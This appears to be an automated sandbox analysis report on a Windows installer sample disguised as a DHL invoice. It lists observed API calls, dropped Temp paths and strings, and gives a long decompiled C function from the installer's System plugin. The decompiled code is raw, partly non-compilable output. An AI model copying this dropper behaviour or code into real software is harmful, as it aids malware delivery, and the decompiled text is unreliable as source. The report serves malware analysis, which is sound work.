0x00000000
0x00402b29
0x00402b2e
0x00402b30
0x00402b37
0x00402b37
0x00000000
0x00000000
0x00402b43
0x00402b48
0x00402b4a
0x004018be
0x004018c0
0x004018c1
0x004018c3
0x00000000
0x004018c3
0x00402b50
0x00402b59
0x00402b5f
0x00402b61
0x00000000
0x00000000
0x00000000
0x00000000
0x00402b77
0x00402b7c
0x00402b85
0x00402b8b
0x00402b8e
0x00402b9c
0x00402b67
0x00402b67
0x00402b6e
0x00402b6f
0x00000000
0x00402b6f
0x00402b90
0x00402b92
0x00402855
0x00402855
0x00402857
0x00000000
0x00000000
0x00402ba5
0x00402bb2
0x00402bb5
0x00402bb9
0x00402bbe
0x00402bc0
0x00402bc4
0x00402bc4
0x00402bca
0x00402bdc
0x00402bde
0x00402be2
0x00402be5
0x00402cb7
0x00402cb7
0x00402cb9
0x00402cba
0x00402cbe
0x00402ccf
0x00402cc0
0x00402cc0
0x00402cc2
0x00402cc4
0x00402ccc
0x00402ccc
0x00402cd3
0x00402cd8
0x00402345
0x00402345
0x00000000
0x00402beb
0x00402beb
0x00402bef
0x00402bf3
0x00402bf7
0x00402ca3
0x00402cad
0x00402cb1
0x00000000
0x00402cb1
0x00402bfd
0x00402c05
0x00402c0f
0x00402c11
0x00402c15
0x00402c17
0x00402c9f
0x00000000
0x00402c9f
0x00402c28
0x00402c39
0x00402c3b
0x00402c3f
0x00402c41
0x00402c84
0x00402c88
0x00402c8e
0x00402c9a
0x00000000
0x00402c9a
0x00402c4d
0x00402c52
0x00402c55
0x00402c7a
0x00402c7e
0x00000000
0x00402c7e
0x00402c57
0x00402c59
0x00402c59
0x00402c5b
0x00402c5e
0x00402c66
0x00402c6b
0x00402c6d
0x00402c6d
0x00402c72
0x00402c76
0x00000000
0x00402c76
0x00000000
0x00402cdf
0x00402ce4
0x00402ce7
0x00402ced
0x00000000
0x00000000
0x00402cf3
0x00402cf7
0x00402cfd
0x00402d03
0x00402d05
0x00402d1a
0x00402d1d
0x00402d1d
0x00402d1f
0x00402d23
0x00402d35
0x00402d39
0x00402d3c
0x00402d3d
0x00402d42
0x00402d42
0x00402d42
0x00402d49
0x00402d25
0x00402d2d
0x00402d2f
0x00402d2f
0x00402d4d
0x00402d51
0x00402d54
0x00402d58
0x00402d5f
0x00402d5f
0x00000000
0x00402d58
0x00402d07
0x00402d0a
0x00000000
0x00000000
0x00402d10
0x00402d13
0x00402d14
0x00401d46
0x00401d46
0x00000000
0x00000000
0x00402d6f
0x00402d72
0x00402d75
0x00401709
0x0040170b
0x00000000
0x0040170b
0x00402d7b
0x00402d7f
0x00402da4
0x00402da9
0x00402dad
0x00402dbf
0x00402dc6
0x00402dc7
0x00402daf
0x00402daf
0x00402db3
0x00402db3
0x00000000
0x00402dad
0x00402d81
0x00402d85
0x00402d9a
0x00402b21
0x00402b21
0x00402b22
0x00000000
0x00402b22
0x00402d8f
0x00000000
0x00000000
0x00402dd1
0x00402dd5
0x00402dd5
0x00402dd7
0x00402e2c
0x00402e2e
0x00402e33
0x00402e35
0x00402e72
0x00402e74
0x00402e75
0x00402e77
0x00000000
0x00402e77
0x00402e37
0x00402e3b
0x00402e3c
0x00402e3d
0x00402e43
0x00402e45
0x00000000
0x00000000
0x00402e47
0x00402e4b
0x00402e4c
0x00402e4d
0x00402e51
0x00402e55
0x00402e56
0x00402e58
0x00402e5a
0x00000000
0x00000000
0x00402e61
0x00402e66
0x00402e6a
0x00000000
0x00402e6a
0x00402dd9
0x00402dd9
0x00402ddc
0x00000000
0x00000000
0x00402deb
0x00402ded
0x00402df3
0x00402df7
0x00402dfa
0x00402dff
0x00402e01
0x00402e06
0x00402e11
0x00402e16
0x00402e1a
0x004016b7
0x004016b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00402e82
0x00402e88
0x00402e8e
0x00402e92
0x00402e9b
0x00402e9b
0x00000000
0x00000000

APIs

PostQuitMessage.USER32(00000000), ref: 004015F1
Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
SetForegroundWindow.USER32 ref: 00401634
ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
SetFileAttributesW.KERNEL32(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll), ref: 004017A3
MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
lstrcatW.KERNEL32(00000000,00000000), ref: 00401920
CompareFileTime.KERNEL32(-00000014,00000000,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Call,40000000,00000001,Call,00000000), ref: 00401A5A
CloseHandle.KERNELBASE(00000000), ref: 00401A61
lstrcatW.KERNEL32(Call,00000000), ref: 00401A82

Strings

user32::EnumWindows(i r1 ,i 0), xrefs: 00401574, 00401993, 004019A3, 004019C0
C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll, xrefs: 00401789, 004017F8, 00401823, 004019B1, 004019D2
C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp, xrefs: 00401998, 004019BB
Call, xrefs: 004018FC, 00401906, 00401913, 00401925, 00401933, 00401968, 0040197C, 004019A2, 004019EA, 00401A7A, 00401A81, 00401A8B, 00401A96
C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang, xrefs: 00401798, 0040190E

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
String ID: C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang$C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp$C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll$Call$user32::EnumWindows(i r1 ,i 0)
API String ID: 3895412863-672211664
Opcode ID: ea0c32077257460a6500ecf870796efa4c25f39d0cf7405ae546488f536fcbdb
Instruction ID: 8c1cf908ae02b995a3a41f7ffac76b054db7533a66b8d62ade7f549c41348504
Opcode Fuzzy Hash: ea0c32077257460a6500ecf870796efa4c25f39d0cf7405ae546488f536fcbdb
Instruction Fuzzy Hash: 38D10870604301BBD710AF26CD85E2B76A8EF85359F204A3FF452B62E1D77CD9019A6E

Uniqueness

Uniqueness Score: -1.00%

Function 6EF22351 Relevance: 18.7, APIs: 12, Instructions: 705
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6EF22351() {
				void _v4;
				void* _v8;
				signed short _v12;
				signed int _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				short* _t243;
				signed short* _t245;
				signed int _t246;
				signed int _t250;
				void* _t256;
				struct HINSTANCE__* _t257;
				signed int _t258;
				signed int _t260;
				void* _t261;
				signed short _t263;
				signed int _t267;
				void* _t268;
				signed int* _t269;
				void* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t287;
				void* _t289;
				signed int _t290;
				void* _t294;
				signed int _t295;
				signed short* _t296;
				void* _t299;
				signed int _t306;
				signed int _t307;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				short* _t320;
				signed int _t321;
				signed short* _t325;
				signed int _t327;
				WCHAR* _t328;
				signed short* _t329;
				signed int _t341;
				void* _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t349;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t355;
				void* _t356;
				void* _t357;
				void* _t358;
				void* _t359;
				signed int _t365;
				signed int _t370;
				void* _t371;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				void* _t381;
				signed short* _t383;
				void* _t384;
				void* _t386;
				signed short* _t387;
				short* _t388;
				WCHAR* _t389;
				WCHAR* _t390;
				struct HINSTANCE__* _t391;
				signed int _t393;
				signed int _t394;
				signed short _t395;
				void _t396;
				void* _t398;
				void* _t403;
				signed int _t405;
				signed int _t407;
				signed int _t409;

				_t394 = 0;
				_v32 = 0;
				_v52 = 0;
				_t386 = 0;
				_v28 = 0;
				_v56 = 0;
				_v24 = 0;
				_v16 = 0;
				_v36 = 0;
				_t243 = E6EF212F8();
				_v40 = _t243;
				_t320 = _t243;
				_v20 = E6EF212F8();
				_t245 = E6EF21593();
				_t325 = _t245;
				_v8 = _t245;
				_v60 = _t325;
				_t387 = _t245;
				_v44 = _t325;
				_v4 = 2;
				while(1) {
					_t378 = _t394;
					if(_t394 != 0 && _t386 == 0) {
						break;
					}
					_t395 =  *_t325 & 0x0000ffff;
					_t246 = _t395 & 0x0000ffff;
					_v12 = _t395;
					_t327 = _t246;
					if(_t327 == 0) {
						_t175 =  &_v52;
						 *_t175 = _v52 | 0xffffffff;
						__eflags =  *_t175;
						L132:
						_t396 = _v32;
						L133:
						_t379 = _t378;
						if(_t379 == 0) {
							 *_t320 = 0;
							__eflags = _t386;
							if(_t386 != 0) {
								_t380 = 0;
								__eflags = 0;
							} else {
								_t289 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t386 = _t289;
								_t380 = 0;
								 *(_t386 + 0x1010) = 0;
								 *((intOrPtr*)(_t386 + 0x1014)) = 0;
							}
							 *(_t386 + 0x1008) = _t380;
							_t184 = _t386 + 8; // 0x8
							_t328 = _t184;
							 *(_t386 + 0x100c) = _t380;
							_t186 = _t386 + 0x808; // 0x808
							_t388 = _t186;
							 *_t328 = 0;
							 *_t388 = 0;
							 *_t386 = _t396;
							 *(_t386 + 4) = _t380;
							_t250 = _t396 - _t380;
							__eflags = _t250;
							if(_t250 == 0) {
								__eflags = _t320 - _v40;
								if(_t320 == _v40) {
									goto L157;
								}
								_t393 = _t380;
								GlobalFree(_t386);
								_push(_v40);
								_t386 = E6EF2135A();
								__eflags = _t386;
								if(_t386 == 0) {
									goto L157;
								} else {
									goto L150;
								}
								while(1) {
									L150:
									_t280 =  *(_t386 + 0x1ca0);
									__eflags = _t280;
									if(_t280 == 0) {
										break;
									}
									_t393 = _t386;
									_t386 = _t280;
								}
								__eflags = _t393;
								if(_t393 != 0) {
									_t193 = _t393 + 0x1ca0;
									 *_t193 =  *(_t393 + 0x1ca0) & 0x00000000;
									__eflags =  *_t193;
								}
								_t281 =  *(_t386 + 0x1010);
								__eflags = _t281 & 0x00000008;
								if((_t281 & 0x00000008) == 0) {
									_t341 = 2;
									_t282 = _t281 | _t341;
									__eflags = _t282;
									 *(_t386 + 0x1010) = _t282;
								} else {
									_t386 = E6EF21309(_t386);
									 *(_t386 + 0x1010) =  *(_t386 + 0x1010) & 0xfffffff5;
								}
								goto L157;
							} else {
								_t284 = _t250 - 1;
								__eflags = _t284;
								if(_t284 == 0) {
									L145:
									lstrcpyW(_t328, _v20);
									L146:
									_push(_v40);
									_push(_t388);
									L147:
									lstrcpyW();
									L157:
									_t329 = _v60;
									L158:
									_t320 = _v40;
									L159:
									_t394 = _v52;
									_t325 =  &(_t329[1]);
									_v60 = _t325;
									_t387 = _t325;
									_v44 = _t325;
									if(_t394 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t287 = _t284 - 1;
								__eflags = _t287;
								if(_t287 == 0) {
									goto L146;
								}
								__eflags = _t287 != 1;
								if(_t287 != 1) {
									goto L157;
								}
								goto L145;
							}
						}
						_t381 = _t379 - 1;
						if(_t381 == 0) {
							_t290 = _v28;
							if(_v24 == _t381) {
								_t290 = _t290 - 1;
							}
							 *((intOrPtr*)(_t386 + 0x1014)) = _t290;
						}
						goto L157;
					}
					_t343 = _t327 - 0x23;
					if(_t343 == 0) {
						__eflags = _t387 - _v8;
						if(_t387 <= _v8) {
							_t344 = _v52;
							L31:
							__eflags = _v36;
							if(_v36 != 0) {
								L15:
								_t345 = _t344;
								__eflags = _t345;
								if(_t345 == 0) {
									_t383 = _v60;
									while(1) {
										__eflags = _t246 - 0x22;
										if(_t246 != 0x22) {
											break;
										}
										_t383 =  &(_t383[1]);
										__eflags = _v36;
										_v60 = _t383;
										_t387 = _t383;
										if(_v36 == 0) {
											__eflags = 1;
											_v36 = 1;
											L123:
											_t329 = _v60;
											 *_t320 =  *_t329;
											_t294 = 2;
											_t320 = _t320 + _t294;
											goto L159;
										}
										_t161 =  &_v36;
										 *_t161 = _v36 & 0x00000000;
										__eflags =  *_t161;
										_t246 =  *_t383 & 0x0000ffff;
									}
									__eflags = _t246 - 0x2a;
									if(_t246 == 0x2a) {
										_t295 = 2;
										_v32 = _t295;
										goto L157;
									}
									_t398 = 0x2d;
									__eflags = _t246 - _t398;
									if(_t246 == _t398) {
										L119:
										_t346 =  *_t383 & 0x0000ffff;
										__eflags = _t346 - _t398;
										if(_t346 != _t398) {
											L124:
											_t296 =  &(_t383[1]);
											_t384 = 0x3a;
											__eflags =  *_t296 - _t384;
											if( *_t296 != _t384) {
												goto L123;
											}
											__eflags = _t346 - _t398;
											if(_t346 == _t398) {
												goto L123;
											}
											__eflags = 1;
											_v32 = 1;
											L127:
											_t329 = _t296;
											_v60 = _t329;
											__eflags = _t320 - _v40;
											if(_t320 <= _v40) {
												 *_v20 = 0;
												goto L158;
											}
											_push(_v40);
											_push(_v20);
											 *_t320 = 0;
											goto L147;
										}
										_t296 =  &(_t387[1]);
										__eflags =  *_t296 - 0x3e;
										if( *_t296 != 0x3e) {
											goto L124;
										}
										_v32 = 3;
										goto L127;
									}
									_t349 = 0x3a;
									__eflags = _t246 - _t349;
									if(_t246 != _t349) {
										goto L123;
									}
									goto L119;
								}
								_t350 = _t345 - 1;
								__eflags = _t350;
								if(_t350 == 0) {
									_t321 = _v28;
									L51:
									_t299 = _t246 + 0xffffffde;
									__eflags = _t299 - 0x55;
									if(_t299 > 0x55) {
										goto L157;
									}
									_t77 = _t299 + 0x6ef22c69; // 0x39000010
									switch( *((intOrPtr*)(( *_t77 & 0x000000ff) * 4 +  &M6EF22BDD))) {
										case 0:
											__ecx = _v40;
											__ebx = _v60;
											_push(2);
											__edx = __bp & 0x0000ffff;
											_pop(__ebp);
											while(1) {
												__ebx = __ebx + 2;
												__eax =  *__ebx & 0x0000ffff;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L90;
												}
												L89:
												__eflags =  *(__ebx + 2) - __dx;
												if( *(__ebx + 2) != __dx) {
													L94:
													__ebp = _v40;
													__eax = 0;
													__eflags = 0;
													_v60 = __ebx;
													 *__ecx = __ax;
													__esi = E6EF212E1(_v40);
													goto L95;
												}
												L90:
												__eflags = __ax;
												if(__ax == 0) {
													goto L94;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__ebx = __ebx + 2;
													__eflags = __ebx;
												}
												__ax =  *__ebx;
												 *__ecx = __ax;
												__ecx = __ecx + __ebp;
												__ebx = __ebx + 2;
												__eax =  *__ebx & 0x0000ffff;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L90;
												}
												goto L89;
											}
										case 1:
											L48:
											_v56 = 1;
											goto L157;
										case 2:
											_v56 = _v56 | 0xffffffff;
											goto L157;
										case 3:
											_v56 = _v56 & __edx;
											__eax = 0;
											_v48 = _v48 & __edx;
											__ebx = __ebx + 1;
											__eax = 1;
											_v28 = __ebx;
											_v24 = 1;
											goto L157;
										case 4:
											__eflags = _v48 - __edx;
											if(_v48 != __edx) {
												goto L157;
											}
											__eax = _v60;
											_push(2);
											_pop(__ecx);
											__eax = _v60 - __ecx;
											_v44 = _v60 - __ecx;
											__esi = E6EF212F8();
											__eax =  &_v44;
											_push(__esi);
											__eax = E6EF21BCF( &_v44);
											_push(__edx);
											_push(__eax);
											__eax = E6EF2149E(__ecx);
											__esp = __esp + 0xc;
											goto L83;
										case 5:
											_v48 = _v48 + 1;
											goto L157;
										case 6:
											_push(7);
											goto L77;
										case 7:
											_push(0x19);
											goto L103;
										case 8:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L60;
										case 9:
											_push(0x15);
											goto L103;
										case 0xa:
											_push(0x16);
											goto L103;
										case 0xb:
											_push(0x18);
											goto L103;
										case 0xc:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L72;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L63;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L78;
										case 0xf:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L76;
										case 0x10:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L67;
										case 0x11:
											_push(3);
											goto L77;
										case 0x12:
											_push(0x17);
											L103:
											_pop(__esi);
											goto L104;
										case 0x13:
											__eax =  &_v44;
											__eax = E6EF21BCF( &_v44);
											_push(0xb);
											_pop(__esi);
											__ecx = __eax + 1;
											__eflags = __eax + 1 - __esi;
											_push("true");
											_pop(__ecx);
											__esi =  >=  ? __eax + 1 : __esi;
											__esi = __eax + __esi;
											__eflags = __esi;
											goto L83;
										case 0x14:
											__esi = __esi | 0xffffffff;
											goto L104;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L70;
										case 0x16:
											__eax = 0;
											goto L78;
										case 0x17:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L74;
										case 0x18:
											_t351 =  *((intOrPtr*)(_t386 + 0x1014));
											__eflags = _t351 - _t321;
											_push("true");
											_t302 =  <=  ? _t321 : _t351;
											_v56 = _v56 & 0;
											_v48 = _v48 & 0;
											_t322 =  <=  ? _t321 : _t351;
											_v28 =  <=  ? _t321 : _t351;
											_v32 - 3 = _t351 - (0 | _v32 == 0x00000003);
											_pop(_t305);
											_t400 =  !=  ? _t305 : _v24;
											_v24 =  !=  ? _t305 : _v24;
											goto L157;
										case 0x19:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L60:
											_push(2);
											_pop(__ecx);
											_v56 = __ecx;
											goto L78;
										case 0x1a:
											L72:
											_push(5);
											goto L77;
										case 0x1b:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L63:
											_push(3);
											_pop(__esi);
											_v56 = __esi;
											goto L78;
										case 0x1c:
											__eax = 0;
											__eax = 1;
											goto L78;
										case 0x1d:
											L76:
											_push(6);
											goto L77;
										case 0x1e:
											L67:
											_push(2);
											goto L77;
										case 0x1f:
											__eax =  &_v44;
											__esi = E6EF21BCF( &_v44) + 1;
											L83:
											__ecx = _v44;
											_v60 = _v44;
											L95:
											__eflags = __esi;
											if(__esi == 0) {
												goto L157;
											}
											L104:
											__edx = _v48;
											0 = 1;
											_v24 = 1;
											__eflags = __edx;
											if(__edx != 0) {
												__eflags = __edx - 1;
												if(__edx == 1) {
													__eax = _v28;
													__eax = _v28 << 5;
													__eflags = __eax;
													 *(__eax + __edi + 0x102c) = __esi;
												}
												L111:
												__edx = __edx + 1;
												_v48 = __edx;
												goto L157;
											}
											__ebx = _v28;
											__ebx = _v28 << 5;
											__eax =  *(__ebx + __edi + 0x1030);
											__eflags = __eax - 0xffffffff;
											if(__eax <= 0xffffffff) {
												L107:
												__eax = GlobalFree(__eax);
												__edx = _v48;
												L108:
												 *(__ebx + __edi + 0x1030) = __esi;
												goto L111;
											}
											__eflags = __eax - 0x19;
											if(__eax <= 0x19) {
												goto L108;
											}
											goto L107;
										case 0x20:
											L70:
											_v16 = _v16 + 1;
											_push(4);
											goto L77;
										case 0x21:
											L74:
											_push(4);
											L77:
											_pop(__eax);
											L78:
											__ecx =  *(0x6ef24094 + __eax * 4);
											0 = 1;
											__esi = __ebx;
											__esi = __ebx << 5;
											__edx =  ~__edx;
											_push(1);
											asm("sbb edx, edx");
											_v24 = 1;
											__edx = __edx & 0x00008000;
											__edx = __edx | __eax;
											0 = 1;
											 *(__esi + __edi + 0x1018) = __edx;
											__edx = _v56;
											__eflags = __ecx;
											__eax =  >  ? __ecx : 1;
											__eflags = __edx;
											_pop(__ecx);
											__eax =  <  ? __ecx :  >  ? __ecx : 1;
											 *((intOrPtr*)(__esi + __edi + 0x1028)) =  <  ? __ecx :  >  ? __ecx : 1;
											__eflags = __edx - __ecx;
											if(__edx == __ecx) {
												__eax =  &_v44;
												__eax = E6EF21BCF( &_v44);
												__ecx = _v44;
												_v60 = _v44;
												__edx = __eax + 1;
												_v56 = __edx;
											}
											__ecx = __ebx + 0x81;
											 *(__esi + __edi + 0x101c) = __edx;
											__ecx = __ebx + 0x81 << 5;
											__edx = 0;
											 *((intOrPtr*)(__esi + __edi + 0x1030)) = 0;
											 *((intOrPtr*)(__esi + __edi + 0x102c)) = 0;
											 *((intOrPtr*)((__ebx + 0x81 << 5) + __edi)) = 0;
											goto L157;
										case 0x22:
											goto L157;
									}
								}
								_t352 = _t350 - 1;
								__eflags = _t352;
								if(_t352 == 0) {
									_t321 = 0;
									_v28 = 0;
									goto L51;
								}
								__eflags = _t352 != 1;
								if(_t352 != 1) {
									goto L123;
								}
								__eflags = _t246 - 0x6e;
								if(__eflags > 0) {
									_t306 = _t246 - 0x72;
									__eflags = _t306;
									if(_t306 == 0) {
										_push(4);
										L43:
										_pop(_t307);
										L44:
										_t354 =  *(_t386 + 0x1010);
										__eflags = _v56 - 1;
										if(_v56 != 1) {
											_t355 = _t354 &  !_t307;
											__eflags = _t355;
										} else {
											_t355 = _t354 | _t307;
										}
										 *(_t386 + 0x1010) = _t355;
										goto L48;
									}
									_t311 = _t306 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L43;
									}
									_t356 = 2;
									__eflags = _t311 != _t356;
									if(_t311 != _t356) {
										goto L157;
									}
									_push(0x40);
									goto L43;
								}
								if(__eflags == 0) {
									_push(8);
									goto L43;
								}
								_t313 = _t246 - 0x21;
								__eflags = _t313;
								if(_t313 == 0) {
									_v56 =  ~_v56;
									goto L157;
								}
								_t314 = _t313 - 0x11;
								__eflags = _t314;
								if(_t314 == 0) {
									_t307 = 0x100;
									goto L44;
								}
								_t315 = _t314 - 0x31;
								__eflags = _t315;
								if(_t315 == 0) {
									_t307 = 1;
									goto L44;
								}
								_t357 = 2;
								__eflags = _t315 != _t357;
								if(_t315 != _t357) {
									goto L157;
								}
								_push(0x20);
								goto L43;
							}
							_v52 = _v52 & 0x00000000;
							_t396 = 0;
							_v32 = 0;
							goto L133;
						}
						_t358 = _v60;
						_t403 = 0x3a;
						__eflags =  *((intOrPtr*)(_t358 - 2)) - _t403;
						_t344 = _v52;
						if( *((intOrPtr*)(_t358 - 2)) != _t403) {
							goto L31;
						}
						__eflags = _t344;
						if(_t344 == 0) {
							goto L15;
						}
						goto L31;
					}
					_t359 = _t343 - 5;
					if(_t359 == 0) {
						__eflags = _v36;
						if(_v36 == 0) {
							_v52 = 1;
							__eflags = _v32 - 3;
							_t370 = (0 | _v32 == 0x00000003) + 1;
							__eflags = _t370;
							_v28 = _t370;
						}
						_v56 = _v56 & 0x00000000;
						_t405 = _v36;
						__eflags = _t405;
						_t361 =  ==  ? _v56 : _v56;
						_v56 =  ==  ? _v56 : _v56;
						_v24 = _v24 & 0x00000000;
						__eflags = _t405;
						_t363 =  ==  ? _v24 : _v24;
						_v24 =  ==  ? _v24 : _v24;
						__eflags = _t405;
						_t365 = 0 | _t405 == 0x00000000;
						_v48 = _v48 & 0x00000000;
						__eflags = _v36;
						_t407 =  ==  ? _v48 : _v48;
						L13:
						_v48 = _t407;
						__eflags = _t365;
						if(_t365 != 0) {
							goto L132;
						}
						L14:
						_t344 = _v52;
						goto L15;
					}
					_t371 = _t359 - 1;
					if(_t371 == 0) {
						_t409 = _v36;
						__eflags = _t409;
						_t373 =  ==  ? _v4 : _v52;
						_v52 =  ==  ? _v4 : _v52;
						_v56 = _v56 & 0x00000000;
						__eflags = _t409;
						_t375 =  ==  ? _v56 : _v56;
						_v56 =  ==  ? _v56 : _v56;
						__eflags = _t409;
						_t365 = 0 | _t409 == 0x00000000;
						_v48 = _v48 & 0x00000000;
						__eflags = _v36;
						_t407 =  ==  ? _v48 : _v48;
						goto L13;
					}
					if(_t371 != 0x16) {
						goto L14;
					} else {
						_v52 = 3;
						_v56 = 1;
						goto L132;
					}
				}
				GlobalFree(_v8);
				GlobalFree(_v40);
				GlobalFree(_v20);
				if(_t386 == 0 ||  *(_t386 + 0x100c) != 0) {
					L185:
					return _t386;
				} else {
					_t256 =  *_t386 - 1;
					if(_t256 == 0) {
						_t221 = _t386 + 8; // 0x8
						_t389 = _t221;
						__eflags =  *_t389;
						if( *_t389 != 0) {
							_t257 = GetModuleHandleW(_t389);
							 *(_t386 + 0x1008) = _t257;
							__eflags = _t257;
							if(_t257 != 0) {
								L173:
								_t226 = _t386 + 0x808; // 0x808
								_t390 = _t226;
								_t258 = E6EF21F7B(_t257, _t390);
								 *(_t386 + 0x100c) = _t258;
								__eflags = _t258;
								if(_t258 == 0) {
									_t261 = 0x23;
									__eflags =  *_t390 - _t261;
									if( *_t390 == _t261) {
										_t228 = _t386 + 0x80a; // 0x80a
										_t263 = E6EF2135A();
										__eflags = _t263;
										if(_t263 != 0) {
											__eflags = _t263 & 0xffff0000;
											if((_t263 & 0xffff0000) == 0) {
												 *(_t386 + 0x100c) = GetProcAddress( *(_t386 + 0x1008), _t263 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									L180:
									_t390[lstrlenW(_t390)] = 0x57;
									_t260 = E6EF21F7B( *(_t386 + 0x1008), _t390);
									__eflags = _t260;
									if(_t260 == 0) {
										__eflags =  *(_t386 + 0x100c);
										L183:
										if(__eflags != 0) {
											goto L185;
										}
										L184:
										_t240 = _t386 + 4;
										 *_t240 =  *(_t386 + 4) | 0xffffffff;
										__eflags =  *_t240;
										goto L185;
									}
									L181:
									 *(_t386 + 0x100c) = _t260;
									goto L185;
								} else {
									__eflags =  *(_t386 + 0x100c);
									if( *(_t386 + 0x100c) != 0) {
										goto L185;
									}
									goto L180;
								}
							}
							_t257 = LoadLibraryW(_t389);
							 *(_t386 + 0x1008) = _t257;
							__eflags = _t257;
							if(_t257 == 0) {
								goto L184;
							}
							goto L173;
						}
						_t222 = _t386 + 0x808; // 0x808
						_t267 = E6EF2135A();
						 *(_t386 + 0x100c) = _t267;
						__eflags = _t267;
						goto L183;
					}
					_t268 = _t256 - 1;
					if(_t268 == 0) {
						_t220 = _t386 + 0x808; // 0x808
						_t269 = _t220;
						__eflags =  *_t269;
						if( *_t269 == 0) {
							goto L185;
						}
						_push(_t269);
						_t260 = E6EF2135A();
						goto L181;
					}
					if(_t268 != 1) {
						goto L185;
					}
					_t210 = _t386 + 8; // 0x8
					_t324 = _t210;
					_push(_t210);
					_t391 = E6EF2135A();
					 *(_t386 + 0x1008) = _t391;
					if(_t391 == 0) {
						goto L184;
					}
					 *((intOrPtr*)(_t386 + 0x104c)) = 0;
					 *((intOrPtr*)(_t386 + 0x1050)) = E6EF212E1(_t324);
					 *((intOrPtr*)(_t386 + 0x103c)) = 0;
					 *((intOrPtr*)(_t386 + 0x1048)) = 1;
					 *((intOrPtr*)(_t386 + 0x1038)) = 1;
					_t217 = _t386 + 0x808; // 0x808
					_t260 =  *(_t391->i + E6EF2135A() * 4);
					goto L181;
				}
			}

0x6ef22359
0x6ef2235b
0x6ef22360
0x6ef22364
0x6ef22366
0x6ef2236a
0x6ef2236e
0x6ef22372
0x6ef22376
0x6ef2237a
0x6ef2237f
0x6ef22383
0x6ef2238a
0x6ef2238e
0x6ef22393
0x6ef22395
0x6ef22399
0x6ef2239d
